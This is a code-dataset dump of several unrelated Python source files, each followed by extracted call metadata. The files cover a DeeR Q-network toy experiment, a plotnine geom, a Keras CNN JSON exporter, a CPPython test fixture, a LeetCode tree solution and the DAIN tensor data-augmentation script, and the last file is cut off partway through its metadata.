UPDATE_RULE = 'rmsprop'
LEARNING_RATE = 0.005
LEARNING_RATE_DECAY = 1.
DISCOUNT = 0.9
DISCOUNT_INC = 1.
DISCOUNT_MAX = 0.99
RMS_DECAY = 0.9
RMS_EPSILON = 0.0001
MOMENTUM = 0
CLIP_NORM = 1.0
EPSILON_START = 1.0
EPSILON_MIN = .1
EPSILON_DECAY = 10000
UPDATE_FREQUENCY = 1
REPLAY_MEMORY_SIZE = 1000000
BATCH_SIZE = 32
FREEZE_INTERVAL = 1000
DETERMINISTIC = True
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# --- Parse parameters ---
parameters = process_args(sys.argv[1:], Defaults)
if parameters.deterministic:
rng = np.random.RandomState(123456)
else:
rng = np.random.RandomState()
# --- Instantiate environment ---
env = Toy_env(rng)
# --- Instantiate qnetwork ---
qnetwork = MyQNetwork(
env,
parameters.rms_decay,
parameters.rms_epsilon,
parameters.momentum,
parameters.clip_norm,
parameters.freeze_interval,
parameters.batch_size,
parameters.update_rule,
rng)
train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1)
test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.)
# --- Instantiate agent ---
agent = NeuralAgent(
env,
qnetwork,
parameters.replay_memory_size,
max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))),
parameters.batch_size,
rng,
train_policy=train_policy,
test_policy=test_policy)
# --- Bind controllers to the agent ---
# Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and
# learning rate as well as the training epoch number.
agent.attach(bc.VerboseController(
evaluate_on='epoch',
periodicity=1))
# During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes.
# Plus, we also want to display after each training episode (!= than after every training) the average bellman
# residual and the average of the V values obtained during the last episode, hence the two last arguments.
agent.attach(bc.TrainerController(
evaluate_on='action',
periodicity=parameters.update_frequency,
show_episode_avg_V_value=True,
show_avg_Bellman_residual=True))
# Every epoch end, one has the possibility to modify the learning rate using a LearningRateController. Here we
# wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given.
agent.attach(bc.LearningRateController(
initial_learning_rate=parameters.learning_rate,
learning_rate_decay=parameters.learning_rate_decay,
periodicity=1))
# Same for the discount factor.
agent.attach(bc.DiscountFactorController(
initial_discount_factor=parameters.discount,
discount_factor_growth=parameters.discount_inc,
discount_factor_max=parameters.discount_max,
periodicity=1))
# As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy
# policy implemented by the agent. This controllers has a bit more capabilities, as it allows one to choose more
# precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every
# episode or epoch (or never, hence the resetEvery='none').
agent.attach(bc.EpsilonController(
initial_e=parameters.epsilon_start,
e_decays=parameters.epsilon_decay,
e_min=parameters.epsilon_min,
evaluate_on='action',
periodicity=1,
reset_every='none'))
# All previous controllers control the agent during the epochs it goes through. However, we want to interleave a
# "test epoch" between each training epoch ("one of two epochs", hence the periodicity=2). We do not want these
# test epoch to interfere with the training of the agent, which is well established by the TrainerController,
# EpsilonController and alike. Therefore, we will disable these controllers for the whole duration of the test
# epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController.
# The value of this argument is a list of the indexes of all controllers to disable, their index reflecting in
# which order they were added. Here, "0" is refering to the firstly attached controller, thus the
# VerboseController; "2" refers to the thirdly attached controller, thus the LearningRateController; etc. The order
# in which the indexes are listed is not important.
# For each test epoch, we want also to display the sum of all rewards obtained, hence the showScore=True.
# Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs]
# *test* epochs.
agent.attach(bc.InterleavedTestEpochController(
id=0,
epoch_length=parameters.steps_per_test,
periodicity=1,
show_score=True,
summarize_every=parameters.period_btw_summary_perfs))
# --- Run the experiment ---
agent.run(parameters.epochs, parameters.steps_per_epoch)
| [((55, 4, 55, 43), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((58, 17, 58, 53), 'deer.default_parser.process_args', 'process_args', ({(58, 30, 58, 42): 'sys.argv[1:]', (58, 44, 58, 52): 'Defaults'}, {}), '(sys.argv[1:], Defaults)', False, 'from deer.default_parser import process_args\n'), ((65, 10, 65, 22), 'Toy_env.MyEnv', 'Toy_env', ({(65, 18, 65, 21): 'rng'}, {}), '(rng)', True, 'from Toy_env import MyEnv as Toy_env\n'), ((68, 15, 77, 12), 'deer.learning_algos.q_net_keras.MyQNetwork', 'MyQNetwork', ({(69, 8, 69, 11): 'env', (70, 8, 70, 28): 'parameters.rms_decay', (71, 8, 71, 30): 'parameters.rms_epsilon', (72, 8, 72, 27): 'parameters.momentum', (73, 8, 73, 28): 'parameters.clip_norm', (74, 8, 74, 34): 'parameters.freeze_interval', (75, 8, 75, 29): 'parameters.batch_size', (76, 8, 76, 30): 'parameters.update_rule', (77, 8, 77, 11): 'rng'}, {}), '(env, parameters.rms_decay, parameters.rms_epsilon, parameters.\n momentum, parameters.clip_norm, parameters.freeze_interval, parameters.\n batch_size, parameters.update_rule, rng)', False, 'from deer.learning_algos.q_net_keras import MyQNetwork\n'), ((60, 14, 60, 43), 'numpy.random.RandomState', 'np.random.RandomState', ({(60, 36, 60, 42): '123456'}, {}), '(123456)', True, 'import numpy as np\n'), ((62, 14, 62, 37), 'numpy.random.RandomState', 'np.random.RandomState', ({}, {}), '()', True, 'import numpy as np\n'), ((96, 17, 98, 22), 'deer.experiment.base_controllers.VerboseController', 'bc.VerboseController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((103, 17, 107, 39), 'deer.experiment.base_controllers.TrainerController', 'bc.TrainerController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((111, 17, 114, 22), 'deer.experiment.base_controllers.LearningRateController', 'bc.LearningRateController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((117, 17, 121, 22), 'deer.experiment.base_controllers.DiscountFactorController', 'bc.DiscountFactorController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((127, 17, 133, 27), 'deer.experiment.base_controllers.EpsilonController', 'bc.EpsilonController', (), '', True, 'import deer.experiment.base_controllers as bc\n'), ((147, 17, 152, 60), 'deer.experiment.base_controllers.InterleavedTestEpochController', 'bc.InterleavedTestEpochController', (), '', True, 'import deer.experiment.base_controllers as bc\n')] |
Dynamical-Systems-Laboratory/IPMCsMD | equilibration/sodium_models/seed_1/post_processing/rdf_calculations.py | 7f0662568d37dce7dcd07b648284aa62991d343c | # ------------------------------------------------------------------
#
# RDF and CN related analysis
#
# ------------------------------------------------------------------
import sys
py_path = '../../../../postprocessing/'
sys.path.insert(0, py_path)
py_path = '../../../../postprocessing/io_operations/'
sys.path.insert(0, py_path)
import cn_and_rdf_lmp as crl
import io_module as io
#
# Input
#
# RDF and CN intput file
rdf_file = '../nafion.rdf'
# Output file
out_file = 'rdf_cn_averaged.txt'
# Number of bins
nbins = 300
# Number of columns
ncols = 10
crl.compute_time_average(rdf_file, out_file, nbins, ncols)
| [((9, 0, 9, 27), 'sys.path.insert', 'sys.path.insert', ({(9, 16, 9, 17): '(0)', (9, 19, 9, 26): 'py_path'}, {}), '(0, py_path)', False, 'import sys\n'), ((11, 0, 11, 27), 'sys.path.insert', 'sys.path.insert', ({(11, 16, 11, 17): '(0)', (11, 19, 11, 26): 'py_path'}, {}), '(0, py_path)', False, 'import sys\n'), ((32, 0, 32, 58), 'cn_and_rdf_lmp.compute_time_average', 'crl.compute_time_average', ({(32, 25, 32, 33): 'rdf_file', (32, 35, 32, 43): 'out_file', (32, 45, 32, 50): 'nbins', (32, 52, 32, 57): 'ncols'}, {}), '(rdf_file, out_file, nbins, ncols)', True, 'import cn_and_rdf_lmp as crl\n')] |
EkremBayar/bayar | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | aad1a32044da671d0b4f11908416044753360b39 | from ..doctools import document
from .geom import geom
from .geom_path import geom_path
from .geom_point import geom_point
from .geom_linerange import geom_linerange
@document
class geom_pointrange(geom):
"""
Vertical interval represented by a line with a point
{usage}
Parameters
----------
{common_parameters}
fatten : float, optional (default: 2)
A multiplicative factor used to increase the size of the
point along the line-range.
"""
DEFAULT_AES = {'alpha': 1, 'color': 'black', 'fill': None,
'linetype': 'solid', 'shape': 'o', 'size': 0.5}
REQUIRED_AES = {'x', 'y', 'ymin', 'ymax'}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity',
'na_rm': False, 'fatten': 4}
@staticmethod
def draw_group(data, panel_params, coord, ax, **params):
geom_linerange.draw_group(data.copy(), panel_params,
coord, ax, **params)
data['size'] = data['size'] * params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_group(data, panel_params, coord, ax, **params)
@staticmethod
def draw_legend(data, da, lyr):
"""
Draw a point in the box
Parameters
----------
data : dataframe
da : DrawingArea
lyr : layer
Returns
-------
out : DrawingArea
"""
geom_path.draw_legend(data, da, lyr)
data['size'] = data['size'] * lyr.geom.params['fatten']
data['stroke'] = geom_point.DEFAULT_AES['stroke']
geom_point.draw_legend(data, da, lyr)
return da
| [] |
SummaLabs/DLS | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | 2adba47430b456ad0f324e4c8883a896a23b3fbf | #!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import json
import os
import skimage.io as skio
import matplotlib.pyplot as plt
import numpy as np
import keras
from keras.models import Model
from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense
from keras.utils.visualize_util import plot as kplot
##################################
def buildModelCNN(inpShape=(3,128,128), sizFlt = 3, numFltStart=16, numCls=2, numHidden=128, funact='relu'):
inpData = Input(shape=inpShape)
# Conv 1'st
x = Convolution2D(nb_filter=1 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(inpData)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 2'nd
x = Convolution2D(nb_filter=2 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 3'rd
x = Convolution2D(nb_filter=3 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 4'th
x = Convolution2D(nb_filter=4 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 5'th
x = Convolution2D(nb_filter=5 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
#
x = Flatten()(x)
if numHidden is not None:
x = Dense(output_dim=numHidden, activation=funact)(x)
x = Dense(output_dim=numCls, activation='softmax')(x)
retModel = Model(inpData, x)
return retModel
##################################
def getBasicModelTemplate(modelName='model_1'):
retTemplate = {
"class_name": "Model",
"keras_version": keras.__version__,
"config": {
"name": "%s" % modelName,
"layers" : [],
"input_layers": [],
"output_layers": [],
}
}
return retTemplate
def generateModelJsonDict(model):
tmpl = getBasicModelTemplate()
tmpLayers = []
for ii,ll in enumerate(model.layers):
tmp = {
'class_name': type(ll).__name__,
'name': ll.name,
'config': ll.get_config(),
}
if ii==0:
tmp['inbound_nodes'] = []
else:
tmp['inbound_nodes'] = [[
[
model.layers[ii-1].name,
0,
0
]
]]
tmpLayers.append(tmp)
tmpl['config']['layers'] = tmpLayers
tmpl['config']['input_layers'] = [
[
model.layers[0].name,
0,
0
]
]
tmpl['config']['output_layers'] = [
[
model.layers[-1].name,
0,
0
]
]
return tmpl
##################################
if __name__ == '__main__':
model = buildModelCNN(inpShape=(3, 128, 128))
fimgModel = 'keras-model-cnn.jpg'
kplot(model, fimgModel, show_shapes=True)
# plt.imshow(skio.imread(fimgModel))
# plt.show()
model.summary()
print ('------')
numLayers = len(model.layers)
for ii,ll in enumerate(model.layers):
print ('[%d/%d] : %s' % (ii, numLayers, ll))
modelJson = generateModelJsonDict(model)
print ('----------------------')
print (json.dumps(modelJson, indent=4))
foutJson = 'test-model-cnn.json'
with open(foutJson, 'w') as f:
json.dump(modelJson, f, indent=4)
# print (json.dumps(modelJson, indent=4))
| [((18, 14, 18, 35), 'keras.layers.Input', 'Input', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((44, 15, 44, 32), 'keras.models.Model', 'Model', ({(44, 21, 44, 28): 'inpData', (44, 30, 44, 31): 'x'}, {}), '(inpData, x)', False, 'from keras.models import Model\n'), ((102, 4, 102, 45), 'keras.utils.visualize_util.plot', 'kplot', (), '', True, 'from keras.utils.visualize_util import plot as kplot\n'), ((20, 8, 21, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((22, 8, 22, 37), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((24, 8, 25, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((26, 8, 26, 37), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((28, 8, 29, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((30, 8, 30, 38), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((32, 8, 33, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((34, 8, 34, 38), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((36, 8, 37, 41), 'keras.layers.Convolution2D', 'Convolution2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((38, 8, 38, 38), 'keras.layers.MaxPooling2D', 'MaxPooling2D', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((40, 8, 40, 17), 'keras.layers.Flatten', 'Flatten', ({}, {}), '()', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((43, 8, 43, 54), 'keras.layers.Dense', 'Dense', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n'), ((112, 11, 112, 42), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((115, 8, 115, 41), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((42, 12, 42, 58), 'keras.layers.Dense', 'Dense', (), '', False, 'from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense\n')] |
Synodic-Software/CPPython | tests/integration/test_interface.py | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | """
Test the integrations related to the internal interface implementation and the 'Interface' interface itself
"""
import pytest
from cppython_core.schema import InterfaceConfiguration
from pytest_cppython.plugin import InterfaceIntegrationTests
from cppython.console import ConsoleInterface
class TestCLIInterface(InterfaceIntegrationTests):
"""
The tests for our CLI interface
"""
@pytest.fixture(name="interface")
def fixture_interface(self):
"""
Override of the plugin provided interface fixture.
Returns:
ConsoleInterface -- The Interface object to use for the CPPython defined tests
"""
configuration = InterfaceConfiguration()
return ConsoleInterface(configuration)
| [((17, 5, 17, 37), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((25, 24, 25, 48), 'cppython_core.schema.InterfaceConfiguration', 'InterfaceConfiguration', ({}, {}), '()', False, 'from cppython_core.schema import InterfaceConfiguration\n'), ((26, 15, 26, 46), 'cppython.console.ConsoleInterface', 'ConsoleInterface', ({(26, 32, 26, 45): 'configuration'}, {}), '(configuration)', False, 'from cppython.console import ConsoleInterface\n')] |
sm2774us/amazon_interview_prep_2021 | solutions/python3/894.py | f580080e4a6b712b0b295bb429bf676eb15668de | class Solution:
def allPossibleFBT(self, N):
def constr(N):
if N == 1: yield TreeNode(0)
for i in range(1, N, 2):
for l in constr(i):
for r in constr(N - i - 1):
m = TreeNode(0)
m.left = l
m.right = r
yield m
return list(constr(N)) | [] |
srijankr/DAIN | src/main.py | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | #@contact Sejoon Oh ([email protected]), Georgia Institute of Technology
#@version 1.0
#@date 2021-08-17
#Influence-guided Data Augmentation for Neural Tensor Completion (DAIN)
#This software is free of charge under research purposes.
#For commercial purposes, please contact the main author.
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
import argparse
import numpy as np
from dataset import TensorDataset
import torch.optim as optim
from model import MLP
import pandas as pd
import copy
import random
from sklearn.model_selection import train_test_split
import os
def parse_args():
parser = argparse.ArgumentParser(description="Run DAIN for the MLP architecture")
parser.add_argument('--path', nargs='?', default='data/synthetic_10K.tensor',
help='Input data path.')
parser.add_argument('--epochs', type=int, default=50,
help='Number of epochs.')
parser.add_argument('--batch_size', type=int, default=1024,
help='Batch size.')
parser.add_argument('--layers', nargs='?', default='[150,1024,1024,128]',
help="Size of each layer. Note that the first layer is the concatenation of tensor embeddings. So layers[0]/N (N=order) is the tensor embedding size.")
parser.add_argument('--lr', type=float, default=0.001,
help='Learning rate.')
parser.add_argument('--verbose', type=int, default=5,
help='Show performance per X iterations')
parser.add_argument('--gpu', type=str, default='0',
help='GPU number')
parser.add_argument('--output', type=str, default='demo.txt',
help = 'output name')
parser.add_argument('--train_ratio', type=float, default=0.9,
help = 'Ratio of training data')
return parser.parse_args()
def model_train_and_test(args, model, train_loader, val_loader,test_loader,first):
output_path = 'output/'+args.output
criterion = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr = args.lr)
device = model.device
min_val,min_test,min_epoch,final_model = 9999,9999,0,0
for epoch in range(args.epochs):
torch.cuda.empty_cache()
running_loss = 0.0
train_loss,valid_loss = 0,0
for i, data in enumerate(val_loader, 0):
inputs, labels, indices = data[0].to(device), data[1].to(device),data[2]
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs - labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs,labels)
loss.backward()
valid_loss += loss.item()
del inputs,labels,outputs,model.intermediate
valid_loss /= (i+1)
test_loss, test_accuracy = 0,0
for i, data in enumerate(test_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
prediction = model(inputs).flatten()
loss = criterion(prediction,labels)
loss.backward()
test_accuracy += torch.sum(torch.pow((prediction-labels),2)).cpu().item()
del inputs,labels,prediction,model.intermediate
test_accuracy/=len(test_loader.dataset)
for i, data in enumerate(train_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
optimizer.zero_grad()
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs-labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
del inputs, labels, outputs,indices,model.intermediate
train_loss /= (i+1)
if epoch%args.verbose==0:
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy))
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy),file=open(output_path,"a"),flush=True)
if min_val<=valid_loss and epoch-min_epoch>=10:
break
if min_val>valid_loss:
min_val = valid_loss
min_test = test_accuracy
min_epoch = epoch
final_model = copy.deepcopy(model)
final_model.allgrad = copy.deepcopy(model.allgrad)
final_model.checkpoint = epoch+1
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val))
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val), file=open(output_path, "a"),flush=True)
del model
return min_test,final_model
def data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device):
#Step 4: data augmentation
if new_tensor.shape[0]!=0:
cur_trainset = copy.deepcopy(trainset)
new_indices = torch.zeros(new_tensor.shape[0]).long()
cur_trainset.add(new_tensor,new_val,new_indices)
first = False
#Step 1: tensor embedding learning
else:
cur_trainset = copy.deepcopy(trainset)
first = True
layers = eval(args.layers)
train_loader = DataLoader(cur_trainset, batch_size=args.batch_size,shuffle=True)
model = MLP(cur_trainset, device, layers=layers).to(device)
model.allgrad = []
if first==True:
model.allgrad = torch.zeros(int(args.epochs),len(cur_trainset)+len(val_loader.dataset)+len(test_loader.dataset),model.last_size)
test_rmse,final_model = model_train_and_test(args, model, train_loader, val_loader, test_loader,first)
del cur_trainset
if new_tensor.shape[0]!=0:
del new_tensor
if new_val.shape[0]!=0:
del new_val
del model
if first==True:
print('[DONE] Step 1: tensor embedding learning')
#Step 2: cell importance calculation
train_idx,val_idx,test_idx = train_loader.dataset.indices,val_loader.dataset.indices,test_loader.dataset.indices
checkpoint = final_model.checkpoint
val_grad = torch.sum(final_model.allgrad[:checkpoint,val_idx,:],dim=1).squeeze()
maxv,maxp = -9999,0
final_model.importance = np.zeros(len(trainset))
for (i,idx) in enumerate(trainset.indices):
train_grad = final_model.allgrad[:checkpoint,idx,:].squeeze()
contribution = torch.mul(train_grad,val_grad)
final_contribution = torch.sum(torch.sum(contribution,dim=1),dim=0).item()
final_model.importance[i] = final_contribution
final_model.importance = final_model.importance / max(final_model.importance)
return (test_rmse,final_model)
def main():
args = parse_args()
path = args.path
layers = eval(args.layers)
learning_rate = args.lr
batch_size = args.batch_size
epochs = args.epochs
verbose = args.verbose
output_path = 'output/'+args.output
if os.path.exists('output/')==False:
os.mkdir('output/')
dataset = TensorDataset(path)
trainset,valset, testset,indices = copy.deepcopy(dataset),copy.deepcopy(dataset),copy.deepcopy(dataset),np.arange(dataset.num_data)
data_train, data_test, labels_train, labels_test, index_train, index_test = train_test_split(dataset.tensor.numpy(), dataset.val.numpy(), indices, test_size=1-args.train_ratio)
data_train, data_val, labels_train, labels_val, index_train, index_val = train_test_split(data_train, labels_train, index_train, test_size=0.2)
trainset.tensor,trainset.val,trainset.num_data,trainset.indices = torch.from_numpy(data_train).long(),torch.from_numpy(labels_train).float(),data_train.shape[0],torch.from_numpy(index_train).long()
valset.tensor,valset.val,valset.num_data,valset.indices = torch.from_numpy(data_val).long(),torch.from_numpy(labels_val).float(),data_val.shape[0],torch.from_numpy(index_val).long()
testset.tensor, testset.val, testset.num_data,testset.indices = torch.from_numpy(data_test).long(), torch.from_numpy(labels_test).float(), data_test.shape[0],torch.from_numpy(index_test).long()
train_loader = DataLoader(trainset, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(valset, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(testset, batch_size=batch_size, shuffle=True)
print('[DONE] Step 0: Dataset loading & train-val-test split')
print(dataset.dimensionality)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu
# CUDA for PyTorch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(device)
#Step 1&2. Train tensor embeddings & calculate cell importance
(rmse,model) = data_augmentation(trainset,torch.empty(0),torch.empty(0),val_loader,test_loader,args,device)
print('Test RMSE before 50% data augmentation = {}'.format(rmse))
print('Test RMSE before 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
original = copy.deepcopy(model)
del model
cell_importance = abs(original.importance)
print('[DONE] Step 2: cell importance calculation')
#Step 3. entity importance calculation
entity_importance = [np.zeros(dataset.dimensionality[i]) for i in range(dataset.order)]
for i in range(len(cell_importance)):
for j in range(dataset.order):
entity = int(trainset.tensor[i,j])
entity_importance[j][entity] += cell_importance[i]
for i in range(dataset.order):
cur = entity_importance[i]
entity_importance[i] = cur/sum(cur)
print('[DONE] Step 3: entity importance calculation')
num_aug = int(0.5 * trainset.tensor.shape[0])
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)))
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)), file=open(output_path, "a"),flush=True)
#Step 4. perform data augmentation
indices = np.zeros((num_aug,trainset.order))
for i in range(dataset.order):
indices[:,i] = np.random.choice(list(range(0,dataset.dimensionality[i])),size=num_aug,p = entity_importance[i])
new_tensor = torch.from_numpy(indices).long()
new_val = original.predict(new_tensor)
print('[DONE] Step 4: data augmentation with entity importance')
(rmse,model) = data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device)
print('Test RMSE after 50% data augmentation = {}'.format(rmse))
print('Test RMSE after 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
del model
if __name__ == "__main__":
main()
| [((23, 13, 23, 85), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((47, 16, 47, 28), 'torch.nn.MSELoss', 'nn.MSELoss', ({}, {}), '()', False, 'from torch import nn\n'), ((130, 19, 130, 84), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((178, 14, 178, 33), 'dataset.TensorDataset', 'TensorDataset', ({(178, 28, 178, 32): 'path'}, {}), '(path)', False, 'from dataset import TensorDataset\n'), ((182, 77, 182, 147), 'sklearn.model_selection.train_test_split', 'train_test_split', (), '', False, 'from sklearn.model_selection import train_test_split\n'), ((187, 19, 187, 76), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((188, 17, 188, 72), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((189, 18, 189, 74), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import Dataset, DataLoader\n'), ((205, 15, 205, 35), 'copy.deepcopy', 'copy.deepcopy', ({(205, 29, 205, 34): 'model'}, {}), '(model)', False, 'import copy\n'), ((230, 14, 230, 48), 'numpy.zeros', 'np.zeros', ({(230, 23, 230, 47): '(num_aug, trainset.order)'}, {}), '((num_aug, trainset.order))', True, 'import numpy as np\n'), ((54, 8, 54, 32), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ({}, {}), '()', False, 'import torch\n'), ((120, 23, 120, 46), 'copy.deepcopy', 'copy.deepcopy', ({(120, 37, 120, 45): 'trainset'}, {}), '(trainset)', False, 'import copy\n'), ((126, 23, 126, 46), 'copy.deepcopy', 'copy.deepcopy', ({(126, 37, 126, 45): 'trainset'}, {}), '(trainset)', False, 'import copy\n'), ((175, 7, 175, 32), 'os.path.exists', 'os.path.exists', ({(175, 22, 175, 31): '"""output/"""'}, {}), "('output/')", False, 'import os\n'), ((176, 8, 176, 27), 'os.mkdir', 'os.mkdir', ({(176, 17, 176, 26): '"""output/"""'}, {}), "('output/')", False, 'import os\n'), ((179, 39, 179, 61), 'copy.deepcopy', 'copy.deepcopy', ({(179, 53, 179, 60): 'dataset'}, {}), '(dataset)', False, 'import copy\n'), ((179, 62, 179, 84), 'copy.deepcopy', 'copy.deepcopy', ({(179, 76, 179, 83): 'dataset'}, {}), '(dataset)', False, 'import copy\n'), ((179, 85, 179, 107), 'copy.deepcopy', 'copy.deepcopy', ({(179, 99, 179, 106): 'dataset'}, {}), '(dataset)', False, 'import copy\n'), ((179, 108, 179, 135), 'numpy.arange', 'np.arange', ({(179, 118, 179, 134): 'dataset.num_data'}, {}), '(dataset.num_data)', True, 'import numpy as np\n'), ((202, 46, 202, 60), 'torch.empty', 'torch.empty', ({(202, 58, 202, 59): '0'}, {}), '(0)', False, 'import torch\n'), ((202, 61, 202, 75), 'torch.empty', 'torch.empty', ({(202, 73, 202, 74): '0'}, {}), '(0)', False, 'import torch\n'), ((212, 25, 212, 60), 'numpy.zeros', 'np.zeros', ({(212, 34, 212, 59): 'dataset.dimensionality[i]'}, {}), '(dataset.dimensionality[i])', True, 'import numpy as np\n'), ((108, 26, 108, 46), 'copy.deepcopy', 'copy.deepcopy', ({(108, 40, 108, 45): 'model'}, {}), '(model)', False, 'import copy\n'), ((109, 34, 109, 62), 'copy.deepcopy', 'copy.deepcopy', ({(109, 48, 109, 61): 'model.allgrad'}, {}), '(model.allgrad)', False, 'import copy\n'), ((131, 12, 131, 52), 'model.MLP', 'MLP', (), '', False, 'from model import MLP\n'), ((156, 27, 156, 57), 'torch.mul', 'torch.mul', ({(156, 37, 156, 47): 'train_grad', (156, 48, 156, 56): 'val_grad'}, {}), '(train_grad, val_grad)', False, 'import torch\n'), ((198, 36, 198, 61), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((233, 17, 233, 42), 'torch.from_numpy', 'torch.from_numpy', ({(233, 34, 233, 41): 'indices'}, {}), '(indices)', False, 'import torch\n'), ((64, 49, 64, 71), 'torch.mul', 'torch.mul', ({(64, 59, 64, 64): 'inter', (64, 65, 64, 70): 'error'}, {}), '(inter, error)', False, 'import torch\n'), ((89, 49, 89, 71), 'torch.mul', 'torch.mul', ({(89, 59, 89, 64): 'inter', (89, 65, 89, 70): 'error'}, {}), '(inter, error)', False, 'import torch\n'), ((121, 22, 121, 54), 'torch.zeros', 'torch.zeros', ({(121, 34, 121, 53): 'new_tensor.shape[0]'}, {}), '(new_tensor.shape[0])', False, 'import torch\n'), ((151, 19, 151, 78), 